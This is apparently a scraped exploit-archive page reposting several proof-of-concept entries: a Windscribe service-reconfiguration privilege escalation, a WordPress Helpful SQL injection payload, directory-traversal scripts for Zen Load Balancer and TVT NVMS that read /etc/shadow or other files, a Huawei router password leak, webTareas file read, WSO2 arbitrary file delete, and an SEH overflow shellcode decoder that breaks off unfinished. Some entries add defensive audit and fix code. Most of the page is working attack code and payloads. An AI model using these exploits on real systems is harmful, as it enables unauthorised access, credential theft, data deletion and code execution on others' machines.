All posts published by ISHACK AI BOT
-
Windscribe 1.83 - 'WindscribeService' Unquoted Service Path
# Exploit Title: Windscribe 1.83 - 'WindscribeService' Unquoted Service Path
# Date: 2020-04-10
# Exploit Author: MgThuraMoeMyint
# Vendor Homepage: https://windscribe.com
# Version: v1.83 Build 20
# Tested on: Windows 10, version 1909

In Windscribe v1.83 the WindscribeService service is installed with a configuration that every authenticated user can modify.

C:\Users\mgthura>sc qc WindscribeService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WindscribeService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Windscribe\WindscribeService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : WindscribeService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

The service runs as LocalSystem, so anyone who can rewrite BINARY_PATH_NAME gets any command executed as SYSTEM. Note that the step below depends on the service's DACL granting SERVICE_CHANGE_CONFIG to standard users (the `sc config` call succeeds from an unprivileged prompt); the unquoted, space-containing image path named in the title is a separate weakness that this PoC does not rely on.

I'll change BINARY_PATH_NAME to a command that adds a user to the local Administrators group (the account must already exist for `net localgroup ... /add` to succeed):

C:\Users\mgthura>sc config WindscribeService binPath= "net localgroup administrators pentest /add"
[SC] ChangeServiceConfig SUCCESS

C:\Users\mgthura>sc stop WindscribeService

SERVICE_NAME: WindscribeService
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3   STOP_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0   (0x0)
        SERVICE_EXIT_CODE  : 0   (0x0)
        CHECKPOINT         : 0x4
        WAIT_HINT          : 0x0

C:\Users\mgthura>sc start WindscribeService
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

Restarting the service fails because the binary path no longer points at a real service executable: net.exe never registers with the Service Control Manager, so the SCM reports error 1053 after its start timeout. The command has nonetheless already run as SYSTEM, and the user has been added to the local Administrators group.
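The advisory shows the `sc qc` output but leaves the reader to eyeball it. The following is an added example, not part of the advisory or of Windscribe, that parses `sc qc` output for the two conditions the PoC relies on (the service runs as LocalSystem and its image path is unquoted with spaces) and parses a service DACL in the SDDL form `sc sdshow <service>` prints to find low-privilege trustees holding a reconfigure right. The SDDL string is a constructed assumption, since the advisory never shows Windscribe's real descriptor; in it Authenticated Users (AU) hold SERVICE_CHANGE_CONFIG (DC), which is the right `sc config ... binPath=` needs.

```python
import re

# `sc qc` output copied from the advisory above; used here as sample input.
SC_QC_OUTPUT = r"""
C:\Users\mgthura>sc qc WindscribeService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WindscribeService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Windscribe\WindscribeService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : WindscribeService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""

# Constructed DACL in the SDDL form `sc sdshow <service>` prints. The advisory does
# not show Windscribe's real descriptor; this one is an assumption that grants
# Authenticated Users (AU) SERVICE_CHANGE_CONFIG (DC), which is what lets
# `sc config ... binPath=` succeed from a standard user's prompt.
SC_SDSHOW_OUTPUT = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
                    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                    "(A;;CCLCSWLOCRRCDCRPWP;;;AU)")

FIELD_RE = re.compile(r"^\s*([A-Z_]{3,})\s*:\s*(.*?)\s*$")
ACE_RE = re.compile(r"\((\w);([^;]*);([A-Z]*);([^;]*);([^;]*);([^)]+)\)")

# Rights that let the holder rewrite the image path (DC), rewrite the DACL itself
# (WD), take ownership (WO, one step from WD) or do anything at all (GA).
RECONFIGURE_RIGHTS = {"DC", "WD", "WO", "GA"}
# Well-known low-privilege trustees: Authenticated Users, Users, Everyone, Interactive.
LOW_PRIV_TRUSTEES = {"AU", "BU", "WD", "IU"}


def parse_sc_qc(text):
    """Turn `sc qc` output into a dict of FIELD -> value."""
    cfg = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            cfg[m.group(1)] = m.group(2)
    return cfg


def is_unquoted_path_with_spaces(binary_path):
    """True when the image path is not quoted and contains a space before the .exe."""
    p = binary_path.strip()
    if p.startswith('"'):
        return False
    idx = p.lower().find(".exe")
    image = p if idx < 0 else p[:idx + 4]
    return " " in image


def low_priv_reconfigure_trustees(sddl):
    """Return the low-privilege trustees whose allow ACE carries a reconfigure right."""
    dacl = sddl.split("D:", 1)[1] if "D:" in sddl else sddl
    dacl = dacl.split("S:", 1)[0]          # drop a trailing SACL if present
    hits = []
    for ace_type, _flags, rights, _obj, _inh, trustee in ACE_RE.findall(dacl):
        if ace_type != "A":                # only allow ACEs grant anything
            continue
        granted = {rights[i:i + 2] for i in range(0, len(rights), 2)}
        if trustee in LOW_PRIV_TRUSTEES and granted & RECONFIGURE_RIGHTS:
            hits.append(trustee)
    return hits


def audit_service(qc_text, sddl):
    """Combine both checks into the findings a privilege-escalation review wants."""
    cfg = parse_sc_qc(qc_text)
    return {
        "runs_as_system": cfg.get("SERVICE_START_NAME", "").lower() == "localsystem",
        "unquoted_path": is_unquoted_path_with_spaces(cfg.get("BINARY_PATH_NAME", "")),
        "low_priv_can_reconfigure": low_priv_reconfigure_trustees(sddl),
    }
```

Feed it the real `sc qc` and `sc sdshow` output from a host to separate the two findings: an unquoted path matters only if a writable directory exists along it, whereas a DC right for AU or BU is exploitable exactly as the advisory shows.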
-
WordPress Plugin Helpful 2.4.11 - SQL Injection
Title: Helpful 2.4.11 SQL Injection - WordPress Plugin
Version: 2.4.11
Software Link: https://wordpress.org/plugins/helpful/
Date of found: 10.04.2019
Author: Numan Türle

core/Core.class.php

// Ajax requests: pro
add_action( 'wp_ajax_helpful_ajax_pro', array( $this, 'helpful_ajax_pro' ) );

// set args for insert command
$args = array(
    'post_id' => $_REQUEST['post_id'],
    'user'    => $_REQUEST['user'],
    'pro'     => $_REQUEST['pro'],
    'contra'  => $_REQUEST['contra']
);
$result = $this->insert( $args );

post_id is passed straight from $_REQUEST into insert(), which runs:

if( !$args['post_id'] ) return false;
$check = $wpdb->get_results("SELECT post_id,user FROM $table_name WHERE user = '$user' AND post_id = $post_id");

Neither value goes through $wpdb->prepare(); post_id is interpolated unquoted, so anything the request sends is executed as SQL. Because the handler is registered with the wp_ajax_ hook only (WordPress fires wp_ajax_nopriv_ for logged-out visitors), the request below is sent from a logged-in session.

Payload:
GET /wp-admin/admin-ajax.php?action=helpful_ajax_pro&contra=0&post_id=if(1=1,sleep(10),0)&pro=1&user=1
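To show why the interpolated query above is injectable and what the fix looks like, here is an added example (not the plugin's code) that rebuilds the same SELECT two ways over an in-memory SQLite table with constructed rows. SQLite has no SLEEP(), so the demonstration uses a boolean payload in the unquoted post_id position instead of the time-based one in the advisory; the shape of the bug is identical.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the plugin's helpful table (constructed rows, not plugin data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE helpful (post_id INTEGER, user TEXT, pro INTEGER, contra INTEGER)")
    conn.executemany("INSERT INTO helpful VALUES (?, ?, ?, ?)",
                     [(1, "1", 1, 0), (2, "1", 0, 1), (3, "7", 1, 0)])
    return conn


def vulnerable_check(conn, user, post_id):
    """Builds the statement the way the plugin's get_results() call does: both values are
    interpolated and post_id is not even quoted, so the request supplies raw SQL."""
    sql = "SELECT post_id, user FROM helpful WHERE user = '%s' AND post_id = %s" % (user, post_id)
    return conn.execute(sql).fetchall()


def safe_check(conn, user, post_id):
    """The fix: force post_id to an integer (what $wpdb->prepare('%d') does) and bind both values."""
    pid = int(post_id)
    return conn.execute(
        "SELECT post_id, user FROM helpful WHERE user = ? AND post_id = ?", (user, pid)
    ).fetchall()


def safe_check_rejects(conn, user, post_id):
    """True when safe_check refuses the input instead of running it."""
    try:
        safe_check(conn, user, post_id)
    except (ValueError, sqlite3.Error):
        return True
    return False
```

With post_id=0 OR 1=1 the vulnerable form returns every row in the table because the injected OR swallows the user filter, while the parameterised form fails at int() before any SQL is built; a MySQL backend would accept the advisory's if(1=1,sleep(10),0) in exactly the same position.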
-
Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
# Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
# Date: 2020-04-10
# Exploit Author: Basim Alabdullah
# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
# Version: 3.10.1
# Tested on: Debian8u2
#
# Technical Details:
# The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
# The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter.
# The requested file was returned in the application's response.
# Note that disclosure of the shadow file may allow an attacker to recover users' passwords.
#
# Impact:
# --------
# Successful exploitation could allow an attacker to obtain sensitive information.
# The request is authenticated: the script sends admin/admin, so substitute valid
# credentials for the appliance if those have been changed.

import sys
import requests

if len(sys.argv) < 3:
    print("Example Use: python exploit.py https://192.168.1.1:444 /etc/shadow")
    sys.exit(-1)

url = sys.argv[1]
files = sys.argv[2]

with requests.Session() as s:
    urlz = url + "/index.cgi?id=2-3&filelog=../../../../../../../../../../../../../../../../" + files + "&nlines=100&action=See+logs"
    # verify=False because the appliance ships with a self-signed certificate
    response = s.get(urlz, auth=('admin', 'admin'), verify=False)
    print(response.text)
-
Huawei HG630 2 Router - Authentication Bypass
# Title: Huawei HG630 2 Router - Authentication Bypass
# Date: 2020-04-13
# Author: Eslam Medhat
# Vendor Homepage: www.huawei.com
# Version: HG630 V2
# HardwareVersion: VER.B
# CVE: N/A

# POC:
The default password of this router is the last 8 characters of the device's serial number, which is printed on the back of the device. An attacker can leak the serial number via the web app API as follows:

************************ Request ************************
GET /api/system/deviceinfo HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: SessionID_R3=0PVHKCwY01etBMntI9TZZRvYX04emsjws0Be4EQ8VcoojhWaRQpOV9E0BbAktJDwzI0au6s1xgl0Cn7bvN9rejjMhJCI1t07f2XDnbo09tjN4mcG0XMyXbMoJLjViHm

************************ Response ************************
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Date: Fri, 01 Jan 2010 09:14:47 GMT
Connection: Keep-Alive
Content-Language: en
Content-Type: application/javascript
Content-Length: 141

while(1); /*{"DeviceName":"HG630 V2","SerialNumber":"T5D7S18815905395","ManufacturerOUI":"00E0FC","UpTime":33288,"HardwareVersion":"VER.B"}*/

The last 8 characters of that serial number are the password used to log in to the router. The bypass only works where the default password has not been changed.

# Reference: https://www.youtube.com/watch?v=vOrIL7L_cVc
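The deviceinfo body is wrapped in `while(1); /* ... */`, which is not valid JSON as returned. The following is an added example, not part of the advisory or of Huawei firmware, that strips that wrapper, decodes the object and applies the advisory's password rule. The serial number in the sample body is a constructed placeholder.

```python
import json
import re

# Response body in the shape the advisory shows. The serial number is a constructed
# placeholder, not a real device's.
SAMPLE_BODY = ('while(1); /*{"DeviceName":"HG630 V2","SerialNumber":"AB12CD3456789012",'
               '"ManufacturerOUI":"00E0FC","UpTime":33288,"HardwareVersion":"VER.B"}*/')

JSON_WRAPPER_RE = re.compile(r"^\s*while\s*\(\s*1\s*\)\s*;\s*/\*(.*)\*/\s*$", re.S)


def is_deviceinfo_response(body):
    """True when the body has the `while(1); /* ... */` wrapper the router emits."""
    return JSON_WRAPPER_RE.match(body) is not None


def parse_deviceinfo(body):
    """Strip the wrapper and decode the JSON inside.

    The wrapper is an anti-JSON-hijacking guard: a <script src=...> include on a
    foreign origin would spin on while(1) and never evaluate the object. It does
    nothing against a client that simply reads the body as text, which is what
    the advisory's direct request does.
    """
    m = JSON_WRAPPER_RE.match(body)
    if not m:
        raise ValueError("response is not in the while(1);/*...*/ form")
    return json.loads(m.group(1))


def default_password(deviceinfo):
    """Apply the advisory's rule: the default password is the last 8 characters of the serial."""
    serial = deviceinfo.get("SerialNumber", "")
    if len(serial) < 8:
        raise ValueError("serial number missing or too short")
    return serial[-8:]
```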
-
TVT NVMS 1000 - Directory Traversal
# Exploit Title: TVT NVMS 1000 - Directory Traversal
# Date: 2020-04-13
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html
# Original Author : Numan Türle
# CVE : CVE-2019-20085

import sys
import time
import requests

if len(sys.argv) != 4:
    print()
    print("Usage : python exploit.py url filename outputname")
    print("Example : python exploit.py http://10.10.10.10/ windows/win.ini win.ini")
    print()
else:
    traversal = "../../../../../../../../../../../../../"
    filename = sys.argv[2]
    url = sys.argv[1] + traversal + filename
    outputname = sys.argv[3]
    content = requests.get(url)
    if content.status_code == 200:
        print()
        print("Directory Traversal Succeeded")
        time.sleep(3)
        print()
        print("Saving Output")
        # Write the retrieved file directly; no need to shell out to touch first.
        with open(outputname, "w") as output_write:
            output_write.write(content.text)
    else:
        print("Host not vulnerable to Directory Traversal!")
-
Webtateas 2.0 - Arbitrary File Read
# Exploit Title: Webtateas 2.0 - Arbitrary File Read
# Date: 2020-04-12
# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd.
# Vendor Homepage: http://webtareas.sourceforge.net/general/home.php
# Software Link: http://webtareas.sourceforge.net/general/home.php
# Version: webTareas v2.0
# Tested on: Windows
# CVE : N/A

Vulnerable Request:

POST /webtareas/includes/general_serv.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 72
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/webtareas/general/home.php?
Cookie: webTareasSID=k2vicb6pn9gsajncg3l6ltbver
DNT: 1

action=cardview-actions&prefix=..%2F&extpath=../../../../Windows/win.ini

The prefix and extpath values are both under the client's control and are combined into the path that the cardview-actions handler reads, so the ../ sequences walk out of the web root. Note that prefix is percent-encoded (..%2F) while extpath is not; both forms reach the file system. The captured request carries a webTareasSID session cookie.
-
WSO2 3.1.0 - Arbitrary File Delete
# Title: WSO2 3.1.0 - Arbitrary File Delete
# Date: 2020-04-12
# Author: raki ben hamouda
# Vendor: https://apim.docs.wso2.com
# Software link: https://apim.docs.wso2.com/en/latest/
# CVE: N/A

Document Title:
===============
WSO2 API Manager (Delete Extension) Arbitrary File Delete (Path Traversal)

## CVE not assigned yet
## Security Update: https://apim.docs.wso2.com/en/latest/

Common Vulnerability Scoring System:
====================================
8.5

Affected Product(s):
====================
WSO2 API Manager Carbon Interface

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
A remote arbitrary file delete vulnerability has been discovered in the official WSO2 API Manager Carbon UI. It allows a remote attacker with a low-privileged account to issue authenticated application requests that delete arbitrary files on the server.

The vulnerability is located in the `/carbon/extensions/deleteExtension-ajaxprocessor.jsp` module, in the `extensionName` parameter that names the extension to delete. As the error message below shows, the value is appended to the registry extensions directory path, and `../` components are honoured, so a crafted value in an authenticated POST request deletes files outside that directory, including configuration files and database (.db) files.

The security risk is estimated as High with a CVSS score of 8.5. Exploitation requires a low-privileged web-application user account and no user interaction. Successful exploitation results in loss of availability, integrity and confidentiality.

===============================
Error generated by the server when the file is not found (from the log file; this is what brought the issue to my attention):

[2020-01-04 01:40:43,318] ERROR - ResourceServiceClient Failed to remove extension.
org.apache.axis2.AxisFault: File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\commons-dir
        at org.apache.axis2.util.Utils.getInboundFaultFromMessageContext(Utils.java:531) ~[axis2_1.6.1.wso2v38.jar:?]
        at org.apache.axis2.description.OutInAxisOperationClient.handleResponse(OutInAxisOperation.java:382) ~[axis2_1.6.1.wso2v38.jar:?]
        at org.apache.axis2.description.OutInAxisOperationClient.send(OutInAxisOperation.java:457) ~[axis2_1.6.1.wso2v38.jar:?]
        at org.apache.axis2.description.OutInAxisOperationClient.executeImpl(OutInAxisOperation.java:228) ~[axis2_1.6.1.wso2v38.jar:?]
        at org.apache.axis2.client.OperationClient.execute(OperationClient.java:149) ~[axis2_1.6.1.wso2v38.jar:?]
        at org.wso2.carbon.registry.extensions.stub.ResourceAdminServiceStub.removeExtension(ResourceAdminServiceStub.java:5954) ~[org.wso2.carbon.registry.extensions.stub_4.7.13.jar:?]
        at org.wso2.carbon.registry.extensions.ui.clients.ResourceServiceClient.deleteExtension(ResourceServiceClient.java:137) [org.wso2.carbon.registry.extensions.ui_4.7.13.jar:?]
        at org.apache.jsp.extensions.deleteExtension_002dajaxprocessor_jsp._jspService(deleteExtension_002dajaxprocessor_jsp.java:139) [hc_795974301/:?]
        at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70) [tomcat_9.0.22.wso2v1.jar:?]

Error displayed in the web browser, in the response body:

<script type="text/javascript">
CARBON.showErrorDialog("File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\nofile.jar");
</script>

=============================
Request Method(s):
[+] POST

Vulnerable Module(s):
[+] /carbon/extensions/deleteExtension-ajaxprocessor.jsp

Vulnerable Parameter(s):
[+] extensionName

Server version 3.0.0

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by a remote attacker with a low-privileged web-application user account and no user interaction.
To reproduce it, follow the steps below.

1- The attacker must have access to the Extension component (List, Add, Delete extensions).
2- The attacker uploads any file with a .jar extension.
3- The attacker intercepts the delete request that follows and replaces the parameter with a traversal string:

--- PoC Session Logs [POST] ---
POST /carbon/extensions/deleteExtension-ajaxprocessor.jsp HTTP/1.1
Host: localhost:9443
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest, XMLHttpRequest
X-Prototype-Version: 1.5.0
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: 0OQG-MM0W-1CY9-K503-1X3I-J4M1-YF2Z-J4NS
Content-Length: 22
Origin: https://localhost:9443
Connection: close
Referer: https://localhost:9443/carbon/extensions/list_extensions.jsp?region=region3&item=list_extensions_menu
Cookie: JSESSIONID=BD1005351C7DC1E70CA763D5EBD5390B; requestedURI=../../carbon/functions-library-mgt/functions-library-mgt-add.jsp?region=region1&item=function_libraries_add; region1_configure_menu=none; region3_registry_menu=visible; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=extensions_menu%252Clist_extensions_menu%2523; MSG15780931689110.08734318816834985=true; MSG15780932448520.1389658752202746=true; MSG15780934638710.11615678726759582=true; MSG15780941514590.39351165459685944=true; MSG15780941548760.1587776077002745=true; MSG15780944563770.9802725740232142=true; MSG15780944882480.28388839177015013=true; MSG15780945113520.5908842754830942=true; menuPanel=visible; menuPanelType=extensions
Pragma: no-cache
Cache-Control: no-cache

extensionName=../../../../INSTALL.txt

--- Returned Headers in Response ---
HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Content-Type: text/html;charset=UTF-8
Content-Length: 10
Date: Sat, 04 Jan 2020 00:55:38 GMT
Connection: close
Server: WSO2 Carbon Server
-
Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)
# Exploit Title: Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)
# Exploit Author: Bobby Cooke
# Date: 2020-04-11
# Vendor: Drive Software Company
# Vendor Site: http://www.drive-software.com
# Software Download: http://www.drive-software.com/download/freeclock.exe
# Tested On: Windows 10 - Pro 1909 (x86) & Home 1909 (x86)
#   - Does not work on x64 version
# Version: Free Desktop Clock 3.0
# Recreate: Install & Open > Time Zones > 'Enter display name' textbox > paste buffer

############################### CRASH INFO ###############################
# [!] Access violation
#   042D15E7   8908   mov [eax], ecx   ; FreeDesk.00440044
# SEH chain of main thread
#   Address    SE handler
#   0014EE24   FreeDesk.00410041   <- Structured Exception Handler Overwrite
#   00410041   74737953
#   69620C00   *** CORRUPT ENTRY ***
############################### CRASH INFO ###############################

File = 'poc.txt'

######################### EXPLOIT ENVIRONMENT INFO #########################
#badChars  = '\x00\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e'
#badChars += '\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f'
#goodChars = '\x81\x8D\x8F\x90\x9D'  (within 0x80-0x9f)
# Base       | Rebase | SafeSEH | ASLR  | NXCompat | Modulename
# 0x00400000 | False  | False   | False | False    | [FreeDesktopClock.exe]
# 0x042b0000 | True   | False   | False | False    | [Clock.dll]
######################### EXPLOIT ENVIRONMENT INFO #########################

os_nSEH = b'\x41' * 457     # Offset to nSEH Overwrite
nSEH = b'\xeb\x05'          # jmp short +2
SEH = b'\xeb\x43'           # 0x004300eb: pop esi # pop ebx # ret [FreeDesktopClock.exe]
# nSEH & SEH translated opcodes after Pop-Pop-Ret
#   EB 00         jmp short +2
#   05 00EB0043   add eax, 4300EB00

# GetPC to decode our decoder using Venetian Blinds technique
getPC = b'\x73'             # add [ebx], dh   # nop | [EBX] = writable memory
getPC += b'\x61'            # popad           # [ESP] = &Payload
getPC += b'\x72'            # add [edx], dh   # realigns execution for 1 byte opcodes
ebx2eax = b'\x58'           # pop eax         # EAX = &Payload
ebx2eax += b'\x72'          # add [edx], dh

# Use Venetian Blinds technique to fix our mangled decoder
# + Using the Venetian Blinds Technique costs 14 bytes to fill 1 0x00 with 1 legit shellcode byte.
#
# Adjust EAX to &Decoder
getDecoder = b'\x05\x13\x11'    # add eax, 0x11001300  # EAX + 512-bytes
getDecoder += b'\x72'           # add [edx], dh
getDecoder += b'\x2D\x11\x11'   # sub eax, 0x11001100  # EAX = &Decoder
getDecoder += b'\x72'           # add [edx], dh
getDecoder += b'\x50'           # push eax             # [ESP] = &Decoder
getDecoder += b'\x72'           # add [edx], dh

############################# ZIPPER DECODER ###############################
# Set EAX = First non-null byte of shellcode
# init:
#   1     | 50         | push eax          # EAX = &Shellcode
#   2     | 5F         | pop edi           # EDI = Decoder Destination Base Address
#   3     | 47         | inc edi           # First 0x00 byte of shellcode
#   4:5   | 33D2       | xor edx, edx
#   6:7   | 33C9       | xor ecx, ecx
#   8:11  | 66:B9 1004 | mov cx, 410       # ECX = Loop Counter
# decodeLoop:
#   12:13 | 33DB       | xor ebx, ebx
#   14    | 42         | inc edx           # EDX+EAX = &SourceShellcodeByte
#   15    | 42         | inc edx           # increment to next non-null byte
#   16:17 | 32DB       | xor bl, bl        # clear BL to hold next shellcode byte
#   18:20 | 021C10     | add bl, [eax+edx] # BL = SourceShellcodeByte
#   21:22 | 203F       | and [edi], bh     # [EDI] = SC-byte, clear with: AND 0x00
#   23:24 | 301F       | xor [edi], bl     # Write next byte of shellcode
#   25    | 47         | inc edi
#   26    | 49         | dec ecx
#   27:28 | 74 02      | je short jmp2code
#   29:30 | ^ EB ED    | jmp short decodeLoop
# jmp2code:
#   31    | 50         | push eax
#   32    | C3         | ret
###########################################################################
#DecoderHex = '505F4733D233C966B9100433DB424232DB021C10203F301F47497402EBED50C3'
firstHalf = b'\x50\x47\xD2\xC9\xB9\x04\xDB\x42\xDB\x1C\x20\x30\x47\x74\xEB\x50'
#venBldHalf = '5F 33 33 66 10 33 42 32 02 10 3F 1F 49 02 ED C3'
#              2  4  6  8  10 12 14 16 18 20 22 24 26 28 30 32
# Note: These nop unicode instructions are actually [reg+0x00] not [reg]
#   The [reg] version (0032) is 2 bytes. The [reg+0x00] version (007200) is 3 bytes
#   Use the 3 byte version for Venetian Blinds alignment
# Example:
#   nasm > add [edx], dh
#   00000000  0032      add [edx],dh
#   nasm > add [edx+00], dh
#   00000000  0032      add [edx],dh
#   nasm > add [edx+01], dh
#   00000000  007201    add [edx+0x1],dh
# + This happens when typing in ASM commands into msf-nasm_shell and immunity

## 2nd byte - \x00 => \x5F
venBlinds = b'\x40'         # inc eax              // now eax points shellcode byte
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\xC6\x5F'    # mov byte [eax], 0x5F
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points shellcode byte
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points to the next '\x00'
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
## 4th byte - \x00 => \x33
venBlinds += b'\xC6\x33'    # mov byte [eax], 0x33
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points shellcode byte
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points to the next '\x00'
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
## 6th byte - \x00 => \x33
venBlinds += b'\xC6\x33'    # mov byte [eax], 0x33
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points shellcode byte
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points to the next '\x00'
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
## 8th byte - \x00 => \x66
venBlinds += b'\xC6\x66'    # mov byte [eax], 0x66
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points shellcode byte
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points to the next '\x00'
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
## 10th byte - \x00 => \x10
venBlinds += b'\xC6\x10'    # mov byte [eax], 0x10
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points shellcode byte
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points to the next '\x00'
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
## 12th byte - \x00 => \x33
venBlinds += b'\xC6\x33'    # mov byte [eax], 0x33
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points shellcode byte
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points to the next '\x00'
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
## 14th byte - \x00 => \x42
venBlinds += b'\xC6\x42'    # mov byte [eax], 0x42
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points shellcode byte
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points to the next '\x00'
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
## 16th byte - \x00 => \x32
venBlinds += b'\xC6\x32'    # mov byte [eax], 0x32
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points shellcode byte
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points to the next '\x00'
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
## 18th byte - \x00 => \x02
venBlinds += b'\xC6\x02'    # mov byte [eax], 0x02
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points shellcode byte
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points to the next '\x00'
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
## 20th byte - \x00 => \x10
venBlinds += b'\xC6\x10'    # mov byte [eax], 0x10
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points shellcode byte
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points to the next '\x00'
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
## 22nd byte - \x00 => \x3F
venBlinds += b'\xC6\x3F'    # mov byte [eax], 0x3F
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points shellcode byte
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
venBlinds += b'\x40'        # inc eax              // now eax points to the next '\x00'
venBlinds += b'\x72'        # add [edx], dh        // nop to realign opcode execution
## 24th byte - \x00 => \x1F
